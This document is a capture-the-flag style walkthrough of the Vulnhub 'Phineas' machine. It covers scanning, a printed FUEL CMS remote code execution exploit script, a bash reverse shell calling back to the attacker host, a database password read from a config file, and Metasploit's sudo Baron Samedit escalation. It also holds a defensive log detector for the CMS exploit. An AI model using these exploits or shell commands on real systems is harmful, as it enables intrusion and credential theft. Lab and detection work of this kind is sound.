Vulnhub: Phineas Target Machine Detailed Walkthrough

Phineas

Identify the target host IP address

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ sudo netdiscover -i eth1

Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:be:bb:0d      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.233  08:00:27:56:5f:21      1      60  PCS Systemtechnik GmbH       

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.233.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.233 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 23:34 EST
Nmap scan report for bogon (192.168.56.233)
Host is up (0.000077s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 ac:d8:0a:a8:6a:1f:78:6d:ac:06:8f:65:3e:ff:9c:8b (RSA)
|   256 e7:f8:b0:07:1c:5b:4a:48:10:bc:f6:36:42:62:6c:e0 (ECDSA)
|_  256 c8:f0:ea:b8:bf:6b:a5:12:1f:9a:91:62:9d:1a:ce:75 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 08:00:27:56:5F:21 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds

The NMAP scan results show that the target host has 4 open ports: 22 (SSH), 80 (HTTP), 111 (RPC) and 3306 (MySQL).

Get Access

First, check whether MySQL accepts a default username and password:

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ mysql -uroot -p -h 192.168.56.233
Enter password: 
ERROR 1130 (HY000): Host '192.168.56.206' is not allowed to connect to this MariaDB server

Visiting port 80 returns the default web page:

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ curl http://192.168.56.233/robots.txt  
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ gobuster dir -u http://192.168.56.233 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.233
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/28 00:53:07 Starting gobuster in directory enumeration mode
===============================================================
/structure            (Status: 301) [Size: 240] [--> http://192.168.56.233/structure/]
Progress: 217711 / 220561 (98.71%)===============================================================
2022/11/28 00:53:36 Finished
===============================================================

Gobuster identified the /structure directory; continue scanning deeper into it:

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ gobuster dir -u http://192.168.56.233/structure/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.233/structure/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,html,sh,php
[+] Timeout:                 10s
===============================================================
2022/11/28 01:00:03 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 217]
/assets               (Status: 301) [Size: 247] [--> http://192.168.56.233/structure/assets/]
/index.php            (Status: 200) [Size: 9288]
/robots.txt           (Status: 200) [Size: 30]
/fuel                 (Status: 301) [Size: 245] [--> http://192.168.56.233/structure/fuel/]
/.html                (Status: 403) [Size: 217]
Progress: 1102758 / 1102805 (100.00%)===============================================================
2022/11/28 01:02:36 Finished
===============================================================

Further scanning found the /fuel directory, which belongs to a CMS (FUEL CMS).

Visiting /structure/fuel is automatically redirected to /structure/fuel/start, but that returns an error.

After checking other people's write-ups, the correct URL should be /structure/index.php/fuel

http://192.168.56.233/structure/index.php/fuel/

This CMS has an unauthenticated remote code execution vulnerability:

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ wget https://gist.githubusercontent.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2/raw/4419f8dc7090a41c7ebc96048daf67c43c1996a3/exploit.py
--2022-11-28 01:18:46--  https://gist.githubusercontent.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2/raw/4419f8dc7090a41c7ebc96048daf67c43c1996a3/exploit.py
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1380 (1.3K) [text/plain]
Saving to: ‘exploit.py’

exploit.py                      100%[=====================================================>]   1.35K  --.-KB/s    in 0s      

2022-11-28 01:18:47 (53.3 MB/s) - ‘exploit.py’ saved [1380/1380]

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ ls
exploit.py  nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ cat exploit.py                       
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

# Updated by Krishna Upadhyay for Python 3

import requests
import urllib.parse  # "import urllib" alone does not guarantee that urllib.parse is loaded


url = "http://10.0.2.29/structure/index.php"  # change to the target host before running

def find_nth_overlapping(haystack, needle, n):
    # Position of the n-th occurrence of needle in haystack (-1 if absent)
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = input('cmd:')
    quoted_xxxx = urllib.parse.quote(xxxx)
    # FUEL CMS <= 1.4.1 evaluates the "filter" parameter of pages/select as PHP
    full_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quoted_xxxx+"%27%29%2b%27"
    # proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(full_url) #, proxies=proxy)

    # Cut the response at the second occurrence of its first 20 characters,
    # then keep only the text before the first <div, which is the command output
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    t = r.text[0:dup]
    div_position = t.find("<div ")
    print(t[0:div_position])

The exploit.py code needs to be modified first (the target host's IP address):

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ python exploit.py                                                                                   
cmd:id
systemuid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0


cmd:which nc
system/usr/bin/nc


cmd:
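From the defender's side, the requests this exploit sends are easy to spot in the web server log: every command is a GET to the pages/select route with a "filter" value containing a quote and PHP function calls. The following is an added example, not part of the original write-up or of FUEL CMS; it assumes Apache's "combined" log format and uses a constructed sample log containing one request built from the payload above.

```python
"""Flag FUEL CMS CVE-2018-16763 exploitation attempts in Apache access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format (assumption); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Vulnerable route: FUEL CMS <= 1.4.1 evaluates the "filter" parameter of pages/select as PHP.
VULN_PATH_RE = re.compile(r"/fuel/pages/select/?$")
# PHP function calls that never belong in a page-name filter (pi( is the call used by the exploit above).
PHP_CALL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|pi)\s*\(", re.I
)
# Variable function call such as $a('...'), the trick the exploit uses to reach system().
VAR_CALL_RE = re.compile(r"\$\w+\s*\(")


def inspect_request(target):
    """Return why a request target looks like a CVE-2018-16763 attempt, or None if it is benign."""
    parts = urlsplit(target)
    path = re.sub(r"/+", "/", parts.path)
    if not VULN_PATH_RE.search(path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "filter" not in params:
        return None
    # parse_qs already decoded once; decode again because double-encoding is a common evasion.
    value = unquote(params["filter"][0])
    reasons = []
    if "'" in value:
        reasons.append("single quote breaks out of the PHP string literal")
    call = PHP_CALL_RE.search(value)
    if call:
        reasons.append("php function call: %s(" % call.group(1).lower())
    if VAR_CALL_RE.search(value):
        reasons.append("variable function call such as $a(")
    return {"path": path, "filter": value, "reasons": reasons} if reasons else None


def scan_log(lines):
    """Return one alert dict per suspicious request found in the given access-log lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = inspect_request(m.group("target"))
        if hit:
            alerts.append({"ip": m.group("ip"), "time": m.group("time"),
                           "status": m.group("status"), **hit})
    return alerts


# Constructed sample log: one exploit-style request (the encoded payload from exploit.py
# running "id"), followed by two benign requests.
SAMPLE_LOG = """\
192.168.56.206 - - [28/Nov/2022:01:20:11 -0500] "GET /structure/index.php/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 9310 "-" "python-requests/2.28.1"
192.168.56.1 - - [28/Nov/2022:01:21:00 -0500] "GET /structure/index.php/fuel/pages/select/?filter=about HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
192.168.56.1 - - [28/Nov/2022:01:22:30 -0500] "GET /structure/ HTTP/1.1" 200 9288 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(alert["ip"], alert["time"], alert["filter"], "|", "; ".join(alert["reasons"]))
```

Matching on the decoded filter value rather than on the raw URL matters because the exploit sends every byte of the PHP payload percent-encoded, so a plain string search for "system" in the log line finds nothing.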

Next, try to spawn a proper shell:

This turns out to be a shell with limited functionality; after some attempts, changing the port to 80 makes the reverse shell connect back successfully:

cmd:bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
system

cmd:bash -i >& /dev/tcp/192.168.56.206/80 0>&1

bash-4.2$ cat database.php
cat database.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
|       ['dsn']      The full DSN string describe a connection to the database.
|       ['hostname'] The hostname of your database server.
|       ['username'] The username used to connect to the database
|       ['password'] The password used to connect to the database
|       ['database'] The name of the database you want to connect to
|       ['dbdriver'] The database driver. e.g.: mysqli.
|                       Currently supported:
|                                cubrid, ibase, mssql, mysql, mysqli, oci8,
|                                odbc, pdo, postgre, sqlite, sqlite3, sqlsrv
|       ['dbprefix'] You can add an optional prefix, which will be added
|                                to the table name when using the  Query Builder class
|       ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
|       ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
|       ['cache_on'] TRUE/FALSE - Enables/disables query caching
|       ['cachedir'] The path to the folder where cache files should be stored
|       ['char_set'] The character set used in communicating with the database
|       ['dbcollat'] The character collation used in communicating with the database
|                                NOTE: For MySQL and MySQLi databases, this setting is only used
|                                as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
|                                (and in table creation queries made with DB Forge).
|                                There is an incompatibility in PHP with mysql_real_escape_string() which
|                                can make your site vulnerable to SQL injection if you are using a
|                                multi-byte character set and are running versions lower than these.
|                                Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
|       ['swap_pre'] A default table prefix that should be swapped with the dbprefix
|       ['encrypt']  Whether or not to use an encrypted connection.
|
|                       'mysql' (deprecated), 'sqlsrv' and 'pdo/sqlsrv' drivers accept TRUE/FALSE
|                       'mysqli' and 'pdo/mysql' drivers accept an array with the following options:
|
|                               'ssl_key'    - Path to the private key file
|                               'ssl_cert'   - Path to the public key certificate file
|                               'ssl_ca'     - Path to the certificate authority file
|                               'ssl_capath' - Path to a directory containing trusted CA certificats in PEM format
|                               'ssl_cipher' - List of *allowed* ciphers to be used for the encryption, separated by colons (':')
|                               'ssl_verify' - TRUE/FALSE; Whether verify the server certificate or not ('mysqli' only)
|
|       ['compress'] Whether or not to use client compression (MySQL only)
|       ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
|                                                       - good for ensuring strict SQL while developing
|       ['ssl_options'] Used to set various SSL options that can be used when making SSL connections.
|       ['failover'] array - A array with 0 or more data for connections if the main should fail.
|       ['save_queries'] TRUE/FALSE - Whether to "save" all executed queries.
|                               NOTE: Disabling this will also effectively disable both
|                               $this->db->last_query() and profiling of DB queries.
|                               When you run a query, with this setting set to TRUE (default),
|                               CodeIgniter will store the SQL statement for debugging purposes.
|                               However, this may cause high memory usage, especially if you run
|                               a lot of SQL queries ... disable this to avoid that problem.
|
| The $active_group variable lets you choose which connection group to
| make active.  By default there is only one group (the 'default' group).
|
| The $query_builder variables lets you determine whether or not to load
| the query builder class.
*/
$active_group = 'default';
$query_builder = TRUE;

$db['default'] = array(
        'dsn'   => '',
        'hostname' => 'localhost',
        'username' => 'anna',
        'password' => 'H993hfkNNid5kk',
        'database' => 'anna',
        'dbdriver' => 'mysqli',
        'dbprefix' => '',
        'pconnect' => FALSE,
        'db_debug' => (ENVIRONMENT !== 'production'),
        'cache_on' => FALSE,
        'cachedir' => '',
        'char_set' => 'utf8',
        'dbcollat' => 'utf8_general_ci',
        'swap_pre' => '',
        'encrypt' => FALSE,
        'compress' => FALSE,
        'stricton' => FALSE,
        'failover' => array(),
        'save_queries' => TRUE
);

// used for testing purposes
if (defined('TESTING'))
{
        @include(TESTER_PATH.'config/tester_database'.EXT);
}
bash-4.2$ 

This gives the password of user anna; switch to user anna:

┌──(kali㉿kali)-[~/Vulnhub/Phineas]
└─$ ssh anna@192.168.56.233 
The authenticity of host '192.168.56.233 (192.168.56.233)' can't be established.
ED25519 key fingerprint is SHA256:25/XYWdRbWeE9Y3AfP5bBwCQiXr/wyKH76cZ+60/KYU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.233' (ED25519) to the list of known hosts.
anna@192.168.56.233's password: 
[anna@phineas ~]$ id
uid=1001(anna) gid=1001(anna) groups=1001(anna) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[anna@phineas ~]$ 

Privilege escalation

msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, us
                                                er, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                                                Using-Metasploit
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS  192.168.56.233
RHOSTS => 192.168.56.233
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME anna
USERNAME => anna
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD H993hfkNNid5kk
PASSWORD => H993hfkNNid5kk
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.56.233:22 - Starting bruteforce
[+] 192.168.56.233:22 - Success: 'anna:H993hfkNNid5kk' 'uid=1001(anna) gid=1001(anna) groups=1001(anna) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux phineas 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.56.206:45741 -> 192.168.56.233:22) at 2022-11-28 01:38:57 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell linux  SSH kali @   192.168.56.206:45741 -> 192.168.56.233:22 (192.168.56.233)

msf6 auxiliary(scanner/ssh/ssh_login) > search 2021-3156

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/linux/local/sudo_baron_samedit  2021-01-26       excellent  Yes    Sudo Heap-Based Buffer Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/sudo_baron_samedit

msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > show options 

Module options (exploit/linux/local/sudo_baron_samedit):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION                       yes       The session to run this module on
   WritableDir  /tmp             yes       A directory where you can write files.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/local/sudo_baron_samedit) > set LPORT 6666
LPORT => 6666
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/sudo_baron_samedit) > exploit

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: 
[*] Started reverse TCP handler on 192.168.56.206:6666 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Using automatically selected target: CentOS 7 x64 (sudo v1.8.23, libc v2.17)
[*] Writing '/tmp/eadWVa7bpS.py' (6207 bytes) ...
[*] A successful exploit will create a new root user msf with password fdocnoxrowembif
[*] Brute forcing ASLR (can take several minutes)...
[+] Success! Created new user msf with password fdocnoxrowembif
[*] Writing '/tmp/Rhoo25UX' (266 bytes) ...
[*] Sending stage (3020772 bytes) to 192.168.56.233
[!] /etc/passwd overwritten, but no session created.
[!] Manual cleanup of the new user in the /etc/passwd file is required.
[!] Take note of the username and password above - these should work to manually escalate privileges.
[+] Deleted /tmp/eadWVa7bpS.py
[+] Deleted /tmp/Rhoo25UX
[*] Cleaning up /etc/passwd
[*] Meterpreter session 2 opened (192.168.56.206:6666 -> 192.168.56.233:46890) at 2022-11-28 01:40:25 -0500

meterpreter > sessions 
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions -i 2
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions 2
[*] Session 2 is already interactive.
meterpreter > 


posted @ 2022-11-28 14:51  Jason_huawen